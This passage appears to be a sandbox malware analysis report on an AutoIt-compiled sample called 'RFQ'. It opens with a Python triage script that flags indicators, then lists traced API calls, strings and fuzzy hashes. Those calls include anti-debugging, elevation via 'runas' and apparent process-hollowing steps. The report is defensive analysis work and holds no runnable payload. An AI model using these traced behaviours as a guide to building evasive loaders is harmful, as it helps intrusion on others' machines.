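    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return {"api": m.group("api"), "module": m.group("module").upper(),
            "args": args, "ref": int(m.group("ref"), 16), "subcall": m.group("sub")}


def triage_record(lines):
    """Turn one function record's API lines into (parsed calls, list of indicator strings)."""
    calls = [c for c in map(parse_api_line, lines) if c]
    apis = {c["api"] for c in calls}
    # Printable arguments are what the tracer could read off the stack: strings, verbs, export names
    strings = {a for c in calls for a in c["args"] if a and not HEXISH.match(a)}
    findings = []
    if "IsDebuggerPresent" in apis:
        findings.append("anti-debug: IsDebuggerPresent")
    # FindResourceExW(hModule, lpType, lpName, wLanguage); type 0xA is RT_RCDATA
    if any(c["api"] == "FindResourceExW" and len(c["args"]) > 2
           and _hex(c["args"][1]) == 10 and c["args"][2].upper() == "SCRIPT" for c in calls):
        findings.append("compiled AutoIt: RT_RCDATA resource named SCRIPT")
    if any("compiled AutoIt script" in s for s in strings):
        findings.append("compiled AutoIt: stub error-message string")
    if "ShellExecuteW" in apis and "runas" in strings:
        findings.append("elevation: 'runas' verb on the stack next to ShellExecuteW")
    if "IsWow64Process" in apis or "GetNativeSystemInfo" in strings:
        findings.append("environment: WoW64 / native architecture probe")
    if {"LoadLibraryA", "GetProcAddress"} <= apis:
        findings.append("dynamic API resolution: LoadLibraryA + GetProcAddress")
    return calls, findings


# Sample input: lines copied from the two records above (start-up path and OS probe)
RECORD_STARTUP = [
    "• GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,006836D8,?), ref: 0068448D",
    "• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,006836D8,?), ref: 006844A0",
    "• Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA",
    "• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007459B8,00000010), ref: 006C371C",
    "• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00742244,00751418,?,?,?,?,?,?,?,006836D8), ref: 006C37F2",
    "• ShellExecuteW.SHELL32(00000000,?,?), ref: 006C37F9",
]
RECORD_OS_PROBE = [
    "• GetVersionExW.KERNEL32(?), ref: 0068618D",
    "• GetCurrentProcess.KERNEL32(?,0071D030,00000000,?,?), ref: 006862A2",
    "• IsWow64Process.KERNEL32(00000000,?,?), ref: 006862A9",
    "• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 006862D4",
    "• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006862E6",
    "• GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 006862F4",
    "• FreeLibrary.KERNEL32(00000000,?,?), ref: 006862FB",
]

if __name__ == "__main__":
    for name, rec in (("startup", RECORD_STARTUP), ("os-probe", RECORD_OS_PROBE)):
        calls, findings = triage_record(rec)
        print(name, len(calls), "calls parsed")
        for f in findings:
            print("  -", f)
```

Note that the "runas" verb is read from the GetForegroundWindow line, not from ShellExecuteW itself: the tracer prints whatever it finds on the stack at the call site, so the rule requires both the ShellExecuteW call and the verb in the same record rather than trusting either alone.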

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
[Graph source for the function starting at 0x686122 (basic blocks 0x686122-0x6C4349): CreateStreamOnHGlobal (0x686122), FindResourceExW (0x68613C), then LoadResource (0x6C42F1), SizeofResource (0x6C4306) and LockResource (0x6C431A); each call's failure edge leads back to the exit block at 0x686159.]
                                                                            APIs
                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00686A4A,?,?,00000000,00000000), ref: 00686132
                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00686A4A,?,?,00000000,00000000), ref: 00686149
                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00686A4A,?,?,00000000,00000000,?,?,?,?,?,?,006868C2), ref: 006C42F5
                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00686A4A,?,?,00000000,00000000,?,?,?,?,?,?,006868C2), ref: 006C430A
                                                                            • LockResource.KERNEL32(Jjh,?,?,00686A4A,?,?,00000000,00000000,?,?,?,?,?,?,006868C2,?), ref: 006C431D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                            • String ID: Jjh$SCRIPT
                                                                            • API String ID: 3051347437-3323507643
                                                                            • Opcode ID: d892f058cd1d7bdb29ecd02eec5472d473e2d1a82d51ed34d28279db6bf04c66
                                                                            • Instruction ID: 7e01a1a7a9b681a2f43dffcff12cabbf5bf5996d55be0a2a77819d086ee32312
                                                                            • Opcode Fuzzy Hash: d892f058cd1d7bdb29ecd02eec5472d473e2d1a82d51ed34d28279db6bf04c66
                                                                            • Instruction Fuzzy Hash: 28117070240701BFD7219BA9DC4DFA77BBAEBC5B51F10866CB54296291DB71DC008B21

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 006858E5: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00751418,?,006848AA,?,?,?,00000000), ref: 00685903
                                                                              • Part of subcall function 00684D82: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00684DA4
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0068545B
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006C3EEC
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006C3F2D
                                                                            • RegCloseKey.ADVAPI32(?), ref: 006C3F6F
                                                                            • _wcslen.LIBCMT ref: 006C3FD6
                                                                            • _wcslen.LIBCMT ref: 006C3FE5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$un
                                                                            • API String ID: 98802146-181247196
                                                                            • Opcode ID: a67872efa17dd29c9fb7c068c6ebf48a5c1861e2bf7c8c0877470e50d2a26aa5
                                                                            • Instruction ID: fe3dc3adc83d747cecaa59bbde5450b51652239c447fe8593ac2d638ded43dde
                                                                            • Opcode Fuzzy Hash: a67872efa17dd29c9fb7c068c6ebf48a5c1861e2bf7c8c0877470e50d2a26aa5
                                                                            • Instruction Fuzzy Hash: B571A3715043009EC344EF69DC519EBB7F9FF46340F40892EF545932A1EBB89949CB5A

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00684732
                                                                            • RegisterClassExW.USER32(00000030), ref: 0068475C
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0068476D
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 0068478A
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0068479A
                                                                            • LoadIconW.USER32(000000A9), ref: 006847B0
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006847BF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: f44ea2cf2dc1f27e161ba81f06adb0398e803ff1cd2f15c38af63bd03967ce32
                                                                            • Instruction ID: e826d628f286e389c01cec94307e8a99a8bde04b6b85803e1dc99d75d01a1bea
                                                                            • Opcode Fuzzy Hash: f44ea2cf2dc1f27e161ba81f06adb0398e803ff1cd2f15c38af63bd03967ce32
                                                                            • Instruction Fuzzy Hash: 4121E2B5941348AFDB01DFE8EC59BDDBBB8FB08702F00C11AF511A62A0D7B855448F98

                                                                            Control-flow Graph

                                                                            (Graph rendering omitted; node legend: Executed / Not Executed.)
                                                                            APIs
                                                                              • Part of subcall function 006C033B: CreateFileW.KERNELBASE(00000000,00000000,?,006C06A5,?,?,00000000,?,006C06A5,00000000,0000000C), ref: 006C0358
                                                                            • GetLastError.KERNEL32 ref: 006C0710
                                                                            • __dosmaperr.LIBCMT ref: 006C0717
                                                                            • GetFileType.KERNELBASE(00000000), ref: 006C0723
                                                                            • GetLastError.KERNEL32 ref: 006C072D
                                                                            • __dosmaperr.LIBCMT ref: 006C0736
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006C0756
                                                                            • CloseHandle.KERNEL32(?), ref: 006C08A0
                                                                            • GetLastError.KERNEL32 ref: 006C08D2
                                                                            • __dosmaperr.LIBCMT ref: 006C08D9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                            • String ID: H
                                                                            • API String ID: 4237864984-2852464175
                                                                            • Opcode ID: 02c675dac1c0432dcec359ab0da3e7f63782947825fa814304453b3a94e1d902
                                                                            • Instruction ID: 9bba7e665cc1f0ebc8e74d25f7a7fc450011895e51ccfcdc58f1dc653b3397da
                                                                            • Opcode Fuzzy Hash: 02c675dac1c0432dcec359ab0da3e7f63782947825fa814304453b3a94e1d902
                                                                            • Instruction Fuzzy Hash: DCA10432A041489FEF19AFA8D851BFD7BA2EB06320F14415DF8159B3D1C6359D13CB95

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 006845B9
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 006845C8
                                                                            • LoadIconW.USER32(00000063), ref: 006845DE
                                                                            • LoadIconW.USER32(000000A4), ref: 006845F0
                                                                            • LoadIconW.USER32(000000A2), ref: 00684602
                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0068461A
                                                                            • RegisterClassExW.USER32(?), ref: 0068466B
                                                                              • Part of subcall function 006846FF: GetSysColorBrush.USER32(0000000F), ref: 00684732
                                                                              • Part of subcall function 006846FF: RegisterClassExW.USER32(00000030), ref: 0068475C
                                                                              • Part of subcall function 006846FF: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0068476D
                                                                              • Part of subcall function 006846FF: InitCommonControlsEx.COMCTL32(?), ref: 0068478A
                                                                              • Part of subcall function 006846FF: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0068479A
                                                                              • Part of subcall function 006846FF: LoadIconW.USER32(000000A9), ref: 006847B0
                                                                              • Part of subcall function 006846FF: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006847BF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                            • String ID: #$0$AutoIt v3
                                                                            • API String ID: 423443420-4155596026
                                                                            • Opcode ID: b8c3bbcc9c77efdfe695a482b2f6aa3f517d73cddfa2342028ee99f00cfab68d
                                                                            • Instruction ID: e544ee1f2168d1e3d3ffd8544bc6f7c04965bc0f69ec95ee9dcc5a8438ca678d
                                                                            • Opcode Fuzzy Hash: b8c3bbcc9c77efdfe695a482b2f6aa3f517d73cddfa2342028ee99f00cfab68d
                                                                            • Instruction Fuzzy Hash: 27217C70E40314ABCB019FE9EC65BD97FB5FB08B42F40C15AE500A22A0D7F90940CF88
                                                                            APIs
                                                                            • __Init_thread_footer.LIBCMT ref: 0068D44E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Init_thread_footer
                                                                            • String ID: p#u$p#u$p#u$p#u$p%u$p%u$x#u$x#u
                                                                            • API String ID: 1385522511-2462287179
                                                                            • Opcode ID: d7d447cb3c12b3ee6280628b25aa28c9f4baaad3b231acadd50256a09174ca86
                                                                            • Instruction ID: 0594070aa6284fbebc971af94eb3cf34bf63f553f9100a9c2189a4bee12ab7ac
                                                                            • Opcode Fuzzy Hash: d7d447cb3c12b3ee6280628b25aa28c9f4baaad3b231acadd50256a09174ca86
                                                                            • Instruction Fuzzy Hash: 3C329E70A002059FDB20EF54C894BFAB7B7EF45310F24815AE945AB392D778ED42CBA5

                                                                            Control-flow Graph

                                                                            (Graph rendering omitted; node legend: Executed / Not Executed.)
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00684B95,?,?), ref: 00684C03
                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,00684B95,?,?), ref: 00684C2F
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00684C52
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00684B95,?,?), ref: 00684C5D
                                                                            • CreatePopupMenu.USER32 ref: 00684C71
                                                                            • PostQuitMessage.USER32(00000000), ref: 00684C92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 129472671-2362178303
                                                                            • Opcode ID: 211f7a583baae9a2b8a57dd7d7678f2d85fec7fc1f440518eff273a00f7c408a
                                                                            • Instruction ID: eafb3c329f6ade2a2086fa4d3c2ed3194d05a1ce4c097039c376b1dbf6e987ec
                                                                            • Opcode Fuzzy Hash: 211f7a583baae9a2b8a57dd7d7678f2d85fec7fc1f440518eff273a00f7c408a
                                                                            • Instruction Fuzzy Hash: B6413834205246ABDB293B788D5DBF83A1FE700382F44C329F942863E1DFF999418769

                                                                            Control-flow Graph

                                                                            (Graph rendering omitted; node legend: Executed / Not Executed.)
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 017177C9
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 017179EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileFreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 204039940-0
                                                                            • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                            • Instruction ID: e53daa5b2767fb75f9068f9934543f6a17e21159a584ebbe6c90f95bc39a40e4
                                                                            • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                            • Instruction Fuzzy Hash: BEA11974E00209EBDB18CFA8C884BEEFBB6BF48304F208599E511BB285D7759A44CF54

                                                                            Control-flow Graph 602: 68468e-6846fe, calling CreateWindowExW * 2 and ShowWindow * 2 (graph image not reproduced)
                                                                            APIs
                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006846BC
                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006846DD
                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,006836D8,?), ref: 006846F1
                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,006836D8,?), ref: 006846FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            • Opcode ID: 4f43bee7be85889235229f25b75ae9d756499445fd67a06fbb302c3d2e9480ed
                                                                            • Instruction ID: 4a9c456cc263ff5492f7c3df893e887883d0799d69e04a0568add9760d091a92
                                                                            • Opcode Fuzzy Hash: 4f43bee7be85889235229f25b75ae9d756499445fd67a06fbb302c3d2e9480ed
                                                                            • Instruction Fuzzy Hash: 8AF03A755803907AEB3107576C28FF73EBDD7CAF52F41805AF900A25B0C2A90840DAB8

                                                                            Control-flow Graph 717: 1717488-17175f7, reaching CreateFileW, VirtualAlloc, ReadFile and ExitProcess (graph image not reproduced)
                                                                            APIs
                                                                              • Part of subcall function 01717378: Sleep.KERNELBASE(000001F4), ref: 01717389
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017175ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileSleep
                                                                            • String ID: N0HJXSESHBZC9ALKXBVY2JO6
                                                                            • API String ID: 2694422964-4193805690
                                                                            • Opcode ID: 71d987dc93b387c5673ba9a2fd70c5deda8428bda656011e3afb8c5bd25053a8
                                                                            • Instruction ID: 0459fcc258be97818395cc4eb70e8e4cf0c3bb26bacb3c2672d44ec9c1d0f174
                                                                            • Opcode Fuzzy Hash: 71d987dc93b387c5673ba9a2fd70c5deda8428bda656011e3afb8c5bd25053a8
                                                                            • Instruction Fuzzy Hash: A4619330D0428CDAEF15DBB8C844BEEFB75AF19700F144498E648BB2C1D6BA1B45CBA5

                                                                            Control-flow Graph 825: starting at 6859a7, reaching RegOpenKeyExW, RegQueryValueExW and RegCloseKey (graph image not reproduced)
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,0068599A,SwapMouseButtons,00000004,?), ref: 006859CB
                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,0068599A,SwapMouseButtons,00000004,?), ref: 006859EC
                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,0068599A,SwapMouseButtons,00000004,?), ref: 00685A0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Control Panel\Mouse
                                                                            • API String ID: 3677997916-824357125
                                                                            • Opcode ID: dc6fa97ccd0aa397b0a09ae92208407972b137899b0fec1bd83ff00c1a5af8ee
                                                                            • Instruction ID: a8f2ceb6cd6230c36d5b4823f33f7db60eb1c14a905eeb90618681db1516b657
                                                                            • Opcode Fuzzy Hash: dc6fa97ccd0aa397b0a09ae92208407972b137899b0fec1bd83ff00c1a5af8ee
                                                                            • Instruction Fuzzy Hash: 2F115A75520608FFDB259FA8DCC59EEBBB9EF04740B108659E802E7210E2319E419B60

                                                                            Control-flow Graph 836: starting at 1716378, reaching CreateProcessW, Wow64GetThreadContext, ReadProcessMemory and Wow64SetThreadContext (graph image not reproduced)
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 01716B33
                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01716BC9
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01716BEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 2438371351-0
                                                                            • Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                                                            • Instruction ID: 0f2bcc1859c4b01bd69837f88bb9e8ff86d08eb1cbaa432f67264e4c4d1abacf
                                                                            • Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                                                            • Instruction Fuzzy Hash: 0562FF30A142589BEB24CFA8C850BDEB776FF58300F1091A9E10DEB394E7759E85CB59
                                                                            APIs
                                                                            • __Init_thread_footer.LIBCMT ref: 006930F6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Init_thread_footer
                                                                            • String ID: CALL$Qdn
                                                                            • API String ID: 1385522511-744523239
                                                                            • Opcode ID: 01591afa75d92e340f573f1ca2eeab00d05f3fdbb024f97b9c6be70027d7eb28
                                                                            • Instruction ID: 110cb57db870824c17c17a7a8b2a1e66ff75d9eff92933590243049a838c298e
                                                                            • Opcode Fuzzy Hash: 01591afa75d92e340f573f1ca2eeab00d05f3fdbb024f97b9c6be70027d7eb28
                                                                            • Instruction Fuzzy Hash: 28229C70608342EFCB14DF14C490A6ABBFABF85314F24895DF4868BBA2D771E945CB46
                                                                            APIs
                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006C40D9
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 0068588F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                                            • String ID: Line:
                                                                            • API String ID: 2289894680-1585850449
                                                                            • Opcode ID: 60bfbf194dc293e722f69f8e1d56b176d46112550bc1528d506d1d00cd06b7c4
                                                                            • Instruction ID: a98f92e6e20fe278269836020b0b5fa7a09afeb9fed0267a78f17a814e4a1834
